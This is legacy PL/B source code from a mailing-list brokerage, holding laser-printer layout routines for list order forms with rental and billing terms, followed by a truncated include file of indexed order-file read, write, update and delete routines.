. *p=3925:650,*font=prtpg10,"C A L I F O R N I A I N C.":
. *p=2800:7900,*font=prtpg10,"1300 Clay Street, 11th Floor, ":
. "Oakland, CA 94612-1429 ","·":
. " 415-989-3350 ","·"," Fax 415-433-7796"
. goto eoj
.
.prtordfrmGuiA Routine Laser
prtordfrmGuiA
.List Management
. prtpage Laser;"D 14154337796 N<NAME> SD<NAME> (510) 302-4660 !^]":
.begin patch 1.3
. prtpage Laser;*units=*HIENGLISH,*ROWSPACE=0,*COLSPACE=0,*Overlayon:
prtpage Laser;*units=*HIENGLISH,*ROWSPACE=0,*COLSPACE=0,*Overlayon
.end patch 1.3
.START PATCH 1.2 REPLACED LOGIC
. *p=5663:125,*font=fontO18b,"Names ":
. *font=FontO18I,"in the News":
. *PENSIZE=10,*p=5402:400,*Line=8402:400:
. *p=5663:450,*font=fontO10,"C A L I F O R N I A I N C .":
. *p=6120:693,*font=fontO7,"1300 Clay Street, 11th Floor":
. *p=6204:793,"Oakland, CA 94612-1429":
. *p=6027:893,"415-989-3350 ","·"," Fax 415-433-7796":
.begin patch 1.3
IF (OcompID = "P")
prtpage Laser;*p=5663:25,*font=fontO18b,"Pacific Lists, Inc.":
*p=6120:343,*font=fontO7,"1300 Clay St. 11th Floor":
.START PATCH 1.31
*p=6014:443,"Oakland, CA 94612-1492":
. *p=6014:443,"Oakland, CA 94312-1492":
.End PATCH 1.31
*p=5980:543,"415-945-9450 ","·"," Fax 415-945-9451":
*p=5980:643,"A Division of Names in the News"
. prtpage Laser;*p=5663:25,*font=fontO18b,"Pacific Lists, Inc.":
. *p=6120:343,*font=fontO7,"100 Tamal Plaza, Suite 50":
. *p=6014:443,"Corte Madera, CA 94925-1182":
. *p=5980:543,"415-945-9450 ","·"," Fax 415-945-9451":
. *p=5980:643,"A Division of Names in the News"
Else
prtpage Laser;*Pictrect=*off,*PICT=0:800:5350:10350:NINLogo
endif
.END PATCH 1.2 REPLACED LOGIC
prtpage Laser;*RECT=115:365:0:1000:
.end patch 1.3
*RECT=115:365:2500:4250:
*p=125:125,*font=FontO14bi,"List Order":
*p=0:637,*line=5233:637:
.START PATCH 1.2 REPLACED LOGIC
. *p=5400:637,*line=8067:637:
*p=5400:787,*line=8067:787:
.END PATCH 1.2 REPLACED LOGIC
. *p=0:637,*line=0:10625:
*p=5:637,*line=5:10625:
.START PATCH 1.2 REPLACED LOGIC
. *p5400:637,*line=5400:10625:
*p5400:787,*line=5400:10625:
.END PATCH 1.2 REPLACED LOGIC
*p5625:1292,*Font=FontO7Dot5B,"Note":
*p5625:1475,*Font=FontO7Dot5,"Names are furnished for one-time use to the":
*p5625:1592,"organization or individual requesting the rental or":
*p5625:1709,"exchange and are not to be copied, revised in any":
*p5625:1826,"form, sold, or given to any other party. Although":
*p5625:1943,"we believe the information concerning this list to":
*p5625:2060,"be accurate we cannot guarantee its accuracy or":
*p5625:2177,"the outcome of the mailing. Names cannot be used":
*p5625:2294,"for telemarketing without written permission from":
*p5625:2411,"the list owner. Post-merge tapes cannot be used":
*p5625:2528,"for storing and scanning purposes without":
*p5625:2645,"notification to the list owner. Mailer reserves the":
*p5625:2762,"right to mail duplicates at a later date.":
*p5625:3062,*Font=FontO7Dot5B,"Billing":
.begin patch 1.3
. *p5625:3245,*Font=FontO7Dot5,"On completion of addressing, bill rentals c/o":
*p5625:3245,*Font=FontO7Dot5,"On completion of addressing, bill rentals c/o"
.START PATCH 1.2 REPLACED LOGIC
. *p5625:3362,"Names in the News, California, Inc., less":
. *p5625:3479,"brokerage commission. We will bill mailer on":
. *p5625:3596,"behalf of list owner; payment (less commission)":
. *p5625:3713,"will be made upon receipt of payment from the":
. *p5625:3830,"mailer. We reserve the right to deduct for":
. *p5625:3947,"unusable names from payment to list owner. We":
. *p5625:4064,"act only as agent for the list owner or the mailer":
. *p5625:4181,"in these transactions.":
.....................................................
.begin patch 1.3
IF (OcompID = "P")
PrtPage Laser;*p5625:3362,"Pacific Lists, Inc., less brokerage commission.":
*p5625:3479,"We will bill mailer on behalf of list owner;":
*p5625:3596,"payment (less commission) will be made upon":
*p5625:3713,"receipt of payment from the mailer. We reserve":
*p5625:3830,"the right to deduct for unusable names from":
*p5625:3947,"payment to list owner. We act only as agent":
*p5625:4064,"for the list owner or the mailer in these":
*p5625:4181,"transactions."
Else
PrtPage Laser;*p5625:3362,"Names in the News, less brokerage commission.":
*p5625:3479,"We will bill mailer on behalf of list owner;":
*p5625:3596,"payment (less commission) will be made upon":
*p5625:3713,"receipt of payment from the mailer. We reserve":
*p5625:3830,"the right to deduct for unusable names from":
*p5625:3947,"payment to list owner. We act only as agent":
*p5625:4064,"for the list owner or the mailer in these":
*p5625:4181,"transactions."
Endif
.END PATCH 1.2 REPLACED LOGIC
PrtPage Laser;*p5625:4548,*font=FontO7Dot5B,"Payment":
.end patch 1.3
*p5625:4731,*font=FontO7Dot5,"Due upon receipt of invoice. Full amount":
*p5625:4848,"required on orders cancelled after mail date; ":
*p5625:4965,"Cancellation by mailer prior to or on mail date ":
*p5625:5082,"subject to a $75.00 processing fee. Volume discount":
*p5625:5199,"includes allowances for rejected data. No additional":
*p5625:5316,"deductions allowed. Discount on Base rate only -- ":
*p5625:5433,"select fees are applied to gross quantity. No":
*p5625:5550,"computer verification necessary.":
*p5625:5917,*font=FontO7Dot5B,"Addressing":
*p5625:6100,*font=FontO7Dot5,"Unless stated in special instructions, it is":
*p5625:6217,"assumed list is in strict zip sequence. Address":
*p5625:6334,"USA names only. All Canadian, foreign, military,":
*p5625:6451,"business, library and institutional names are to":
*p5625:6568,"be omitted.":
*RECT=6733:6891:5625:5750:
*p5775:6733,"This is a test. Address a representative cross":
*p5775:6858,"section and keep a record to avoid duplication":
*p5775:6975,"on continuations.":
*RECT=7116:7266:5625:5750:
*p5775:7116,"This is a continuation. No omit required.":
*RECT=7366:7516:5625:5750:
*p5775:7366,"This is a continuation. Omit the following:":
*RECT=7866:8016:5625:5750:
*p5775:7866,"Entire list/or all available in specified":
*p5775:7983,"select. Advise if quantity differs by 10% or more.":
*p5625:8233,*font=FontO7Dot5B,"Important":
*p5625:8416,*font=FontO7Dot5,"If you cannot comply with these instructions, or":
*p5625:8533,"if charges shown are not correct, notify us by":
*p5625:8650,"phone for our approval prior to addressing.":
*p5625:8767,"Adjustments not approved before addressing will":
*p5625:8884,"not be accepted. Magnetic Tape orders - tape will":
*p5625:9001,"not be returned unless requested in writing by ":
.begin patch 1.3
*p5625:9118,"list owner."
. *p5625:9118,"list owner.":
IF (OcompID = "P")
PrtPage Laser;*p5625:9300,"PL Contact:"
Else
PrtPage Laser;*p5625:9300,"NIN Contact:"
Endif
. *p5875:10400,*font=fonto9i,"Member Direct Marketing Association"
PrtPage Laser;*p5875:10400,*font=fonto9i,"Member Direct Marketing Association"
.end patch 1.3
.START PATCH 1.1 REPLACED LOGIC
. prtpage Laser;*units=*HIENGLISH,*ROWSPACE=0,*COLSPACE=0,*Overlayon:
. *p125:887,*font=FontO7Dot5B,"LR ##":
. *p2500:887,*font=FontO7Dot5I,"Date:":
. *p125:1075,"Mailer P.O.":
. *p2500:1075,"Client No.:":
. *p125:1263,"Mailer:":
. *p125:1763,"Offer:":
. *p125:2263,"List Owner:":
. *p125:3138,"CC To:":
. *p125:3451,"List:":
. *p125:4076,"Quantity:":
. *p2500:4076,"Per M $":
. *p125:4451,"Key/List ID:":
. *p125:4801,"Furnished on:":
. *p125:5001,"Return to:":
. *p125:6501,"Ship to arrive by:":
. *p2500:6501,"Via:":
. *p125:6876,"Mail Date:":
. *p125:7126,*font=FontO7Dot5BI,"Special Instructions:",*font=FontO7Dot5
prtpage Laser;*units=*HIENGLISH,*ROWSPACE=0,*COLSPACE=0,*Overlayon:
*p125:800,*font=FontO7Dot5B,"LR ##":
*p2500:800,*font=FontO7Dot5I,"Date:":
*p125:988,"Mailer P.O.":
*p2500:988,"Client No.:":
*p125:1176,"Mailer:":
; *p125:1603,"Offer:":
; *p125:2093,"List Owner:":
; *p125:2918,"CC To:":
.START PATCH 1.21
*p125:1876,"Offer:":
*p125:2281,"List Owner:":
*p125:3006,"CC To:":
.START PATCH 1.2
*p125:3211,"List:":
*p125:3587,"Quantity:":
*p2500:3587,"Base $":
*p125:5251,"Key/List ID:":
*p125:5501,"Furnished on:":
*p125:5751,"Return to:":
*p125:6689,"Ship to arrive by:":
*p2200:6689,"Via:":
*p125:6876,"Mail Date:":
*p125:7126,*font=FontO7Dot5BI,"Special Instructions:",*font=FontO7Dot5
.END PATCH 1.1 REPLACED LOGIC
return
.prtordfrmGuiB Routine Laser
prtordfrmGuiB
. prtpage Laser;"D 14154337796 N<NAME> SD<NAME> (510) 302-4660 !^]":
prtpage Laser;*units=*HIENGLISH,*ROWSPACE=0,*COLSPACE=0,*Overlayon
.begin patch 1.3
IF (OcompID = "P")
prtpage Laser;*p=5663:25,*font=fontO18b,"Pacific Lists, Inc.":
*p=6120:343,*font=fontO7,"1300 Clay St. 11th Floor":
.START PATCH 1.31
*p=6014:443,"Oakland, CA 94612-1492":
. *p=6014:443,"Oakland, CA 94312-1492":
.End PATCH 1.31
*p=5980:543,"415-945-9450 ","·"," Fax 415-945-9451":
*p=5980:643,"A Division of Names in the News"
. prtpage Laser;*p=5663:25,*font=fontO18b,"Pacific Lists, Inc.":
. *p=6120:343,*font=fontO7,"100 Tamal Plaza, Suite 50":
. *p=6014:443,"Corte Madera, CA 94925-1182":
. *p=5980:543,"415-945-9450 ","·"," Fax 415-945-9451":
. *p=5980:643,"A Division of Names in the News"
. *p=6120:393,*font=fontO7,"100 Tamal Plaza, Suite 50":
. *p=6014:493,"Corta Madera, CA 94942-1429":
. *p=5980:593,"415-945-9450 ","·"," Fax 415-945-9451":
. *p=6204:793,"A Division of Names in the News"
Else
.START PATCH 1.2 REPLACED LOGIC
. *p=5663:125,*font=fontO18b,"Names ":
. *font=FontO18I,"in the News":
. *PENSIZE=10,*p=5402:400,*Line=8402:400:
. *p=5663:450,*font=fontO10,"C A L I F O R N I A I N C .":
. *p=6120:693,*font=fontO7,"1300 Clay Street, 11th Floor":
. *p=6204:793,"Oakland, CA 94612-1429":
. *p=6027:893,"415-989-3350 ","·"," Fax 415-433-7796":
prtpage Laser;*Pictrect=*off,*PICT=0:800:5350:10350:NINLogo
endif
.End patch 1.3
.END PATCH 1.2 REPLACED LOGIC
prtpage Laser;*RECT=115:365:0:1000:
*RECT=115:365:2500:4250:
*p=125:125,*font=FontO14bi,"List Order":
*p=0:637,*line=5233:637:
.START PATCH 1.2 REPLACED LOGIC
. *p=5400:637,*line=8067:637:
*p=5400:787,*line=8067:787:
.END PATCH 1.2 REPLACED LOGIC
. *p=0:637,*line=0:10625:
*p=5:637,*line=5:10625:
.START PATCH 1.2 REPLACED LOGIC
. *p5400:637,*line=5400:10625:
*p5400:787,*line=5400:10625:
.END PATCH 1.2 REPLACED LOGIC
*p5625:1475,*Font=FontO7Dot5B,"Note":
*p5625:1658,*Font=FontO7Dot5,"Names are furnished for one-time use to the":
*p5625:1775,"organization or individual requesting the rental":
*p5625:1892,"or exchange and are not to be copied, revised in":
*p5625:2009,"any form, sold, or given to any other party.":
*p5625:2126,"Although we believe the information concerning":
*p5625:2243,"this list to be accurate we cannot guarantee its":
*p5625:2360,"accuracy or the outcome of the mailing. Names":
*p5625:2477,"cannot be used for telemarketing without written":
*p5625:2594,"permission from the list owner. Post-merge tapes":
*p5625:2711,"cannot be used for storing and scanning":
*p5625:2828,"purposes without notification to the list owner.":
*p5625:2945,"Mailer reserves the right to mail duplicates at a":
*p5625:3062,"later date.":
*p5625:3312,*Font=FontO7Dot5B,"Billing":
.Begin patch 1.3
. *p5625:3495,*Font=FontO7Dot5,"On completion of addressing, bill rentals c/o":
*p5625:3495,*Font=FontO7Dot5,"On completion of addressing, bill rentals c/o"
.START PATCH 1.2 REPLACED LOGIC
. *p5625:3612,"Names in the News, California, Inc., less":
. *p5625:3729,"brokerage commission. We will bill mailer on":
. *p5625:3846,"behalf of list owner; payment (less commission)":
. *p5625:3963,"will be made upon receipt of payment from the":
. *p5625:4080,"mailer. We reserve the right to deduct for":
. *p5625:4197,"unusable names from payment to list owner. We":
. *p5625:4314,"act only as agent for the list owner or the mailer":
. *p5625:4431,"in these transactions.":
.....................................................
IF (OcompID = "P")
prtpage Laser;*p5625:3612,"Pacific Lists, Inc., less brokerage commission.":
*p5625:3729,"We will bill mailer on behalf of list owner;":
*p5625:3846,"payment (less commission) will be made upon":
*p5625:3963,"receipt of payment from the mailer. We reserve":
*p5625:4080,"the right to deduct for unusable names from":
*p5625:4197,"payment to list owner. We act only as agent":
*p5625:4314,"for the list owner or the mailer in these":
*p5625:4431,"transactions."
Else
prtpage Laser;*p5625:3612,"Names in the News, less brokerage commission.":
*p5625:3729,"We will bill mailer on behalf of list owner;":
*p5625:3846,"payment (less commission) will be made upon":
*p5625:3963,"receipt of payment from the mailer. We reserve":
*p5625:4080,"the right to deduct for unusable names from":
*p5625:4197,"payment to list owner. We act only as agent":
*p5625:4314,"for the list owner or the mailer in these":
*p5625:4431,"transactions."
endif
.END PATCH 1.2 REPLACED LOGIC
. *p5625:4681,*font=FontO7Dot5B,"Payment":
PrtPage Laser;*p5625:4681,*font=FontO7Dot5B,"Payment":
.End patch 1.3
*p5625:4864,*font=FontO7Dot5,"Due upon receipt of invoice. Full amount":
*p5625:4981,"required on orders cancelled after mail date;":
*p5625:5098,"Cancellation by mailer prior to or on mail date":
*p5625:5215,"subject to a $75.00 processing fee.":
*p5625:5565,*font=FontO7Dot5B,"Addressing":
*p5625:5748,*font=FontO7Dot5,"Unless stated in special instructions, it is":
*p5625:5865,"assumed list is in strict zip sequence. Address":
*p5625:5982,"USA names only. All Canadian, foreign, military,":
*p5625:6099,"business, library and institutional names are to":
*p5625:6216,"be omitted.":
*RECT=6733:6891:5625:5750:
*p5775:6733,"This is a test. Address a representative cross":
*p5775:6858,"section and keep a record to avoid duplication":
*p5775:6975,"on continuations.":
*RECT=7116:7266:5625:5750:
*p5775:7116,"This is a continuation. No omit required.":
*RECT=7366:7516:5625:5750:
*p5775:7366,"This is a continuation. Omit the following:":
*RECT=7866:8016:5625:5750:
*p5775:7866,"Entire list/or all available in specified":
*p5775:7983,"select. Advise if quantity differs by 10% or more.":
*p5625:8233,*font=FontO7Dot5B,"Important":
*p5625:8416,*font=FontO7Dot5,"If you cannot comply with these instructions, or":
*p5625:8533,"if charges shown are not correct, notify us by":
*p5625:8650,"phone for our approval prior to addressing.":
*p5625:8767,"Adjustments not approved before addressing will":
*p5625:8884,"not be accepted. Magnetic Tape orders - tape will":
*p5625:9001,"not be returned unless requested in writing by ":
.begin patch 1.3
. *p5625:9118,"list owner.":
*p5625:9118,"list owner."
IF (OcompID = "P")
PrtPage Laser;*p5625:9300,"PL Contact:"
Else
PrtPage Laser;*p5625:9300,"NIN Contact:"
Endif
. *p5875:10400,*font=fonto9i,"Member Direct Marketing Association"
PrtPage Laser;*p5875:10400,*font=fonto9i,"Member Direct Marketing Association"
.end patch 1.3
.START PATCH 1.1 REPLACED LOGIC
. prtpage Laser;*units=*HIENGLISH,*ROWSPACE=0,*COLSPACE=0,*Overlayon:
. *p125:887,*font=FontO7Dot5B,"LR ##":
. *p2500:887,*font=FontO7Dot5I,"Date:":
. *p125:1075,"Mailer P.O.":
. *p2500:1075,"Client No.:":
. *p125:1263,"Mailer:":
. *p125:1763,"Offer:":
. *p125:2263,"List Owner:":
. *p125:3138,"CC To:":
. *p125:3451,"List:":
. *p125:4076,"Quantity:":
. *p2500:4076,"Per M $":
. *p125:4451,"Key/List ID:":
. *p125:4801,"Furnished on:":
. *p125:5051,"Return to:":
. *p125:6501,"Ship to arrive by:":
. *p2500:6501,"Via:":
. *p125:6876,"Mail Date:":
. *p125:7126,*font=FontO7Dot5BI,"Special Instructions:",*font=FontO7Dot5
prtpage Laser;*units=*HIENGLISH,*ROWSPACE=0,*COLSPACE=0,*Overlayon:
*p125:800,*font=FontO7Dot5B,"LR ##":
*p2500:800,*font=FontO7Dot5I,"Date:":
*p125:988,"Mailer P.O.":
*p2500:988,"Client No.:":
*p125:1176,"Mailer:":
; *p125:1603,"Offer:":
; *p125:2093,"List Owner:":
; *p125:2918,"CC To:":
.START PATCH 1.21
*p125:1876,"Offer:":
*p125:2281,"List Owner:":
*p125:3006,"CC To:":
.START PATCH 1.21
*p125:3211,"List:":
*p125:3587,"Quantity:":
*p2500:3587,"Base $":
*p125:5251,"Key/List ID:":
*p125:5501,"Furnished on:":
*p125:5751,"Return to:":
*p125:6689,"Ship to arrive by:":
*p2200:6689,"Via:":
*p125:6876,"Mail Date:":
*p125:7126,*font=FontO7Dot5BI,"Special Instructions:",*font=FontO7Dot5
.END PATCH 1.1 REPLACED LOGIC
return
.
.prtmlrboxGui Routine Laser
prtmlrboxGui
prtpage Laser;*units=*HIENGLISH,*ROWSPACE=0,*COLSPACE=0,*Overlayon:
*p=2800:125,*font=FontO14b,"Mailer Copy"
return
.
.prtofficeboxGui Routine Laser
prtofficeboxGui
prtpage Laser;*units=*HIENGLISH,*ROWSPACE=0,*COLSPACE=0,*Overlayon:
*p=2800:125,*font=FontO14b,"Office Copy"
return
.
.prtownerboxGui Routine Laser
prtownerboxGui
prtpage Laser;*units=*HIENGLISH,*ROWSPACE=0,*COLSPACE=0,*Overlayon:
*p=2700:125,*font=FontO14b,"List Owner Copy"
; *p=2675:125,*font=FontO14b,"List Owner Copy"
return
.
.prtFulfilboxGui Routine Laser
prtFulfilboxGui
prtpage Laser;*units=*HIENGLISH,*ROWSPACE=0,*COLSPACE=0,*Overlayon:
*p=2700:125,*font=FontO14b,"Fulfilment Copy"
return
. include NORDIO.INC
.prtordfrmPL Routine Laser temporary to rpint old PLI forms
prtordfrmPL
prtpage Laser;*units=*HIENGLISH,*ROWSPACE=0,*COLSPACE=0,*Overlayon
prtpage Laser;*p=0:0,*font=PRTpg24B,"Pacific Lists, Inc.":
*p=3500:20,*font=fonto10,"1300 Clay St. 11th Floor, ":
.START PATCH 1.31
. "Oakland, CA 94312-1492":
"Oakland, CA 94612-1492":
.End PATCH 1.31
*p=3750:175,"Office: 415-945-9450 ","·"," Fax 415-945-9451":
*p=0:350,*font=fontO7,"A Division of Names in the News":
*p0:675,*font=fonto10,"OUR ##":
*p0:875,"DATE:":
*p0:1075,"CLIENT REF.NO.":
*p0:1325,"CLIENT:":
*p0:2375,"MAILER:":
*p0:2675,"OFFER:":
*p0:3000,"SUPPLIER:":
*p0:4000,"LIST:":
*p0:4375,"SELECTION:":
*p0:4675,"FORMAT:":
*p0:5025,"KEY EACH LABEL:":
*p3125:5025,"RATE:":
*p0:5325,"QUANTITY:":
*p0:5675,"ADD'L:":
*p0:5785,"CHARGES:":
*p0:6625,"SHIP TO:":
*p4900:1525,"CONTACT:":
*p5375:1650,"AT:":
*p4900:2050,"WANTED BY:":
*p4900:2375,"MAIL DATE:":
*p4900:2675,"SHIP VIA:":
*p6275:3160,*font=fonto10B,"MAILER":
*p6075:4300,"LIST OWNER",*font=FontO9:
*p5120:3375,"The names furnished for this order may be used once":
*p5120:3500,"only for the offer stated and may not be duplicated or":
*p5120:3625,"remailed. We believe information concerning this list":
*p5120:3750,"to be accurate, but we do not guarantee its accuracy or":
*p5120:3875,"the outcome of the mailing.":
*p5120:4550,"Please send a statement of charges to Pacific Lists, Inc.":
*p5120:4675,"We are acting as agent for the list owner only, and will":
*p5120:4800,"invoice our client on the owner's behalf. Upon receipt ":
*p5120:4925,"of payment, we will remit promptly less the standard ":
*p5120:5050,"brokerage commission. We do not guarantee payment ":
*p5120:5175,"from the client who is solely responsible for payment on":
*p5120:5300,"this order. If liability for sales, use or other tax is ":
*p5120:5425,"asserted, Pacific Lists as agent disclaims all liability ":
*p5120:5550,"or responsibility for payment or collection of such tax.":
*p5120:5800,"Unless otherwise stated, names are to be in zip sequence.":
*p5120:5925,"Mailer resrves the right to mail multi-buyers.":
*p5120:6175,"Omit: Canadia, Puerto Rico, foreign and military names":
*p5120:6300,"unless otherwise specified."
. prtpage Laser;*RECT=1250:2250:1100:4625:
. *RECT=2900:3900:1100:4625:
prtpage Laser;*RECT=1250:2250:1300:4825:
*RECT=3020:4020:1300:4825:
*RECT=3175:6600:5100:8000
PrtPage Laser;*p5875:10400,*font=fonto9i,"Member Direct Marketing Association":
*p3575:7450,*font=fonto10,"Special Instructions",*font=FontO7Dot5:
*p0:7525,*line=3500:7525:
*p4725:7525,*line=10000:7525
return
.Greenbox .blockout supplier
Greenbox
CREATE blockout=3:20:30:50:
"\\NINS1\e\netutils\blockout.tif"
CREATE blockout1=3:20:30:50:
"\\NINS1\e\netutils\blockout2.tif"
prtpage Laser;*Pictrect=*on,*PICT=3020:4020:1300:4825:Blockout1
return
. Create Black=000:000:000
. Create NoFill=255:255:255
. getitem Black,0,colornum
prtpage Laser;*fill=*on,*BgColor=colornum,*RECT=2900:3900:1300:4825
. getitem NoFill,0,colornum
prtpage Laser;*fill=*off,*BgColor=colornum
return
Whitebox
CREATE blockout=3:20:30:50:
"\\NINS1\e\netutils\blockout.tif"
CREATE blockout1=3:20:30:50:
"\\NINS1\e\netutils\blockout2.tif"
. CREATE blockout=3:13:30:50,"\\nts0\c\netutils\blockout.jpg"
prtpage Laser;*Pictrect=*off,*PICT=1550:2250:1300:4825:Blockout
return
. Create Black=000:000:000
. Create NoFill=255:255:255
. getitem Black,0,colornum
prtpage Laser;*fill=*on,*BgColor=colornum,*RECT=1550:2250:1225:4750
. getitem NoFill,0,colornum
prtpage Laser;*fill=*off,*BgColor=colornum
return
<file_sep>/include/NORDIO3.INC
..............................................................................
.
. NORDIO INCLUSION
. NIN ORDER FILE I/O ROUTINES
.
. FILE NAME : NINORD
. REC LENGTH: 262 FIXED
. INDEX KEY : (1) 7-12 (LR#)
.AIMDEX KEYS: (1) 3-6 (MAILER#)
. (2) 16-21 (LIST#)
. (3) 26-32 (PO#)
. (4) 269-272(broker#)
..............................................................................
.
. ENTRY POINT : NORDKEY
. REQUIRED : 'NORDPATH', 'NORDFLD', or 'nordfld4
. RETURNED : ORDER RENORD
. DESCRIPTION : EXACT ISAM KEY READ
.
.NORDKEY COMPARE NORDPATH TO NORDFLAG
NORDKEY branch nordpath to nord1a,norderr
.NORDKEY branch nordpath to nord1a,norderr,nord1c
nord1a compare nordpath to nordflag
GOTO NORD1b IF EQUAL
CALL NORDOPEN
NORD1B FILEPI 1;NORDFILE
READ NORDFILE,NORDFLD;ORDVARS
.
RETURN
.
.nord1c branch nordflg3 to nord1d
. CALL NORDOPN3
NORD1d
. FILEPI 1;NORDFLE3
. READ NORDFLE3,NORDFLD4;ORDVARS
.
RETURN
..............................................................................
.
. ENTRY POINT : NORDTST
. REQUIRED : NORDFLD
. RETURNED :
. DESCRIPTION : TEST KEY
.
.NORDTST COMPARE NORDPATH TO NORDFLAG
NORDTST branch nordpath to nord2a,norderr,nord2c
nord2a COMPARE NORDPATH TO NORDFLAG
GOTO NORD2b IF EQUAL
CALL NORDOPEN
NORD2b FILEPI 1;NORDFILE
READ NORDFILE,NORDFLD;STR1
RETURN
.
.nord2c branch NORDFLG3 to nord2d
. CALL NORDOPN3
.NORD2d FILEPI 1;NORDFLE3
. READ NORDFLE3,NORDFLD4;;
. RETURN
.nord2e BRANCH NORDFLG2 TO NORD2f
nord2c BRANCH NORDFLG2 TO NORD2d
CALL NORDOPN2
.NORD2f FILEPI 1;NORDFLE2
NORD2d FILEPI 1;NORDFLE2
READ NORDFLE2,NORDFLD1,NORDFLD2,NORDFLD3,NORDFLD4;str1
RETURN
..............................................................................
.
. ENTRY POINT : NORDKS
. REQUIRED : 'NORDPATH'
. RETURNED : ORDER RENORD
. DESCRIPTION : KEY SEQUENTIAL ORDER FILE READ
.
nordks
.NORDKS COMPARE NORDPATH TO NORDFLAG
.NORDKS branch nordpath to nord3a,norderr,nord3c
nord3a COMPARE NORDPATH TO NORDFLAG
GOTO NORD3b IF EQUAL
CALL NORDOPEN
NORD3b FILEPI 1;NORDFILE
READKS NORDFILE;ORDVARS
.
RETURN
.
.nord3c branch NORDFLG3 to nord3d
. CALL NORDOPN3
.NORD3d FILEPI 1;NORDFLE3
. READKS NORDFLE3;ORDVARS
.
. RETURN
..............................................................................
.
. ENTRY POINT : NORDSEQ
. REQUIRED :
. RETURNED : ORDER RENORD
. DESCRIPTION : SEQUENTIAL ORDER FILE READ
.
NORDSEQ BRANCH NORDFLAG TO NORD4
CALL NORDOPEN
NORD4 FILEPI 1;NORDFILE
READ NORDFILE,SEQ;ORDVARS
RETURN
..............................................................................
.
. ENTRY POINT : NORDWRT
. REQUIRED : 'NORDFLD', 'NORDPATH=1'
. RETURNED :
. DESCRIPTION : EXACT ISAM KEY TXT/ISI INSERT., ISI 2/3 INSERTS.
.
NORDWRT MOVE C1 TO NORDPATH
NORDWRT1 COMPARE NORDPATH TO NORDFLAG
GOTO NORD5 IF EQUAL
CALL NORDOPEN
NORD5 FILEPI 1;NORDFILE
WRITE NORDFILE,NORDFLD;ORDVARS
.
CALL NORDWRT2
. CALL NORDWRT3
RETURN
.
NORDWRT2 BRANCH NORDFLG2 TO NORD5B
CALL NORDOPN2
NORD5B FILEPI 1;NORDFLE2
INSERT NORDFLE2
RETURN
.
.NORDWRT3 BRANCH NORDFLG3 TO NORD5C
. CALL NORDOPN3
NORD5c
. FILEPI 1;NORDFLE3
. INSERT NORDFLE3,NORDFLD4
RETURN
.
..............................................................................
.
. ENTRY POINT : NORDUPD
. REQUIRED : A PREVIOUS KEY READ, 'NORDPATH'
. RETURNED :
. DESCRIPTION : KEY UPDATE ORDER FILE
.
NORDUPD COMPARE NORDPATH TO NORDFLAG
GOTO NORD6 IF EQUAL
CALL NORDOPEN
NORD6 FILEPI 1;NORDFILE
UPDATE NORDFILE;ORDVARS
RETURN
..............................................................................
.
. ENTRY POINT : NORDDEL
. REQUIRED : 'NORDPATH', 'NORDFLD'
. RETURNED :
. DESCRIPTION : PATH=1 DELETES TXT & ALL KEYS. PATH=2/3/4 DELETES KEY ONLY.
.
NORDDEL BRANCH NORDPATH TO NORDDEL1,NORDDEL2
.
NORDDEL1 COMPARE NORDPATH TO NORDFLAG
GOTO NORD7 IF EQUAL
CALL NORDOPEN
NORD7 CALL NORDKEY
RETURN IF OVER
MOVE OLRN TO NORDFLD
FILEPI 1;NORDFILE
DELETE NORDFILE,NORDFLD
RETURN
.
NORDDEL2 BRANCH NORDFLG2 TO NORD7B
CALL NORDOPN2
NORD7B FILEPI 1;NORDFLE2
DELETE NORDFLE2
RETURN
.
..............................................................................
.
. ENTRY POINT : NORDKP
. REQUIRED : 'NORDPATH'
. RETURNED : ORDER RENORD
. DESCRIPTION : KEY SEQUENTIAL ORDER FILE READ
.
NORDKP COMPARE NORDPATH TO NORDFLAG
GOTO NORD8 IF EQUAL
CALL NORDOPEN
NORD8 FILEPI 1;NORDFILE
READKP NORDFILE;ORDVARS
.
RETURN
..............................................................................
.
. ENTRY POINT : NORDAIM
. REQUIRED : NORDFLD1,NORDFLD2,NORDFLD3,nordfld4
. RETURNED : ORDER RECORD
. DESCRIPTION : AIM ORDER FILE READ
. APPLICATION'S RESPONSIBILITY TO TEST FLAGS
.
NORDAIM BRANCH NORDFLG2 TO NORD9
. GOTO NORD9 IF EQUAL
CALL NORDOPN2
NORD9 FILEPI 1;NORDFLE2
READ NORDFLE2,NORDFLD1,NORDFLD2,NORDFLD3,NORDFLD4;ORDVARS
RETURN
..............................................................................
..............................................................................
.
. ENTRY POINT : NORDAIMt
. REQUIRED : NORDFLD1,NORDFLD2,NORDFLD3,nordfld4
. RETURNED : OVER/OR NOT
. DESCRIPTION : AIM ORDER FILE TEST READ
. APPLICATION'S RESPONSIBILITY TO TEST FLAGS
.
NORDAIMT BRANCH NORDFLG2 TO NORD12
. GOTO NORD9 IF EQUAL
CALL NORDOPN2
NORD12 FILEPI 1;NORDFLE2
READ NORDFLE2,NORDFLD1,NORDFLD2,NORDFLD3,NORDFLD4;;
RETURN
..............................................................................
.
. ENTRY POINT : NORDKG
. REQUIRED : VALID PREVIOUS AIM READ
. RETURNED : ORDER RECORD
. DESCRIPTION : AIM KEY GENEREIC ORDERFILE READ
. APPLICATION'S RESPONSIBILITY TO TEST FLAGS
.
NORDKG BRANCH NORDFLG2 TO NORD10
CALL NORDOPN2
NORD10 FILEPI 1;NORDFLE2
READKG NORDFLE2;ORDVARS
SCAN "F *" IN ERROR
if equal
display *p1:20,olrn,*w2
endif
RETURN
..............................................................................
.
IFZ PC
. ENTRY POINT : NORDKGP
. REQUIRED : PREVIOUS VALID AIM READ
. RETURNED : ORDER RECORD
. DESCRIPTION : Aim KEY GENERIC PRIOR ORDER FILE READ
. APPLICATION'S RESPONSIBILITY TO TEST FLAGS
.
NORDKGP BRANCH NORDFLG2 TO NORD11
CALL NORDOPN2
NORD11 FILEPI 1;NORDFLE2
READKGP NORDFLE2;ORDVARS
RETURN
XIF
..............................................................................
.
. ENTRY POINT : NORDlast
. REQUIRED : NORDFLD1,NORDFLD2,NORDFLD3,nordfld4
. RETURNED : ORDER RECORD
. DESCRIPTION : AIM ORDER FILE READ last matching record
. APPLICATION'S RESPONSIBILITY TO TEST FLAGS
.
NORDlast BRANCH NORDFLG2 TO NORD13
. GOTO NORD13 IF EQUAL
CALL NORDOPN2
NORD13 FILEPI 1;NORDFLE2
READLast NORDFLE2,NORDFLD1,NORDFLD2,NORDFLD3,NORDFLD4;ORDVARS
RETURN
..............................................................................
...............................................................................
.
. ENTRY POINT : NORDOPEN
. REQUIRED : 'NORDPATH'
. RETURNED : 'NORDFLAG' SET TO THE PATH NUMBER: 'NORDPATH', IF OPENNED.
